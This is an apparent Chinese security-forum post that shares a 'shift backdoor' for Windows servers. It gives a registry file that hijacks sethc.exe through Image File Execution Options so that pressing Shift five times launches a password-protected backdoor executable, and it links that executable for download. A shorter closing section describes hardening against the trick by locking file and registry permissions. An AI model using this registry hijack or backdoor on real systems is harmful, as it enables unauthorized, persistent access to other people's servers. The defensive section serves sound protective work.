原创:坏狼安全网 www.winshell.cn
今天群里朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码. 5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角... 前提是先运行个p处理或reg,这个方法比较牛X.. 注册表如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] "Debugger"="C:\\www.winshell.cn.exe" 这个exe存的路径是:c:\\www.winshell.cn.exe exe文件顺便发上来...登陆密码:猜吧.
 下载文件 (已下载 2 次)
-----------------------------------------------------以下是安全设置--------------------------- 知道上边原理:就可以设置安全了.... 在服务器里按5下shift,出设置把所有的对号去掉. 删除所有文件安全设置下用户,加everyone设置全部拒绝 C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe 修改注册表权限,同上. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
后门和安全都讲了.....
|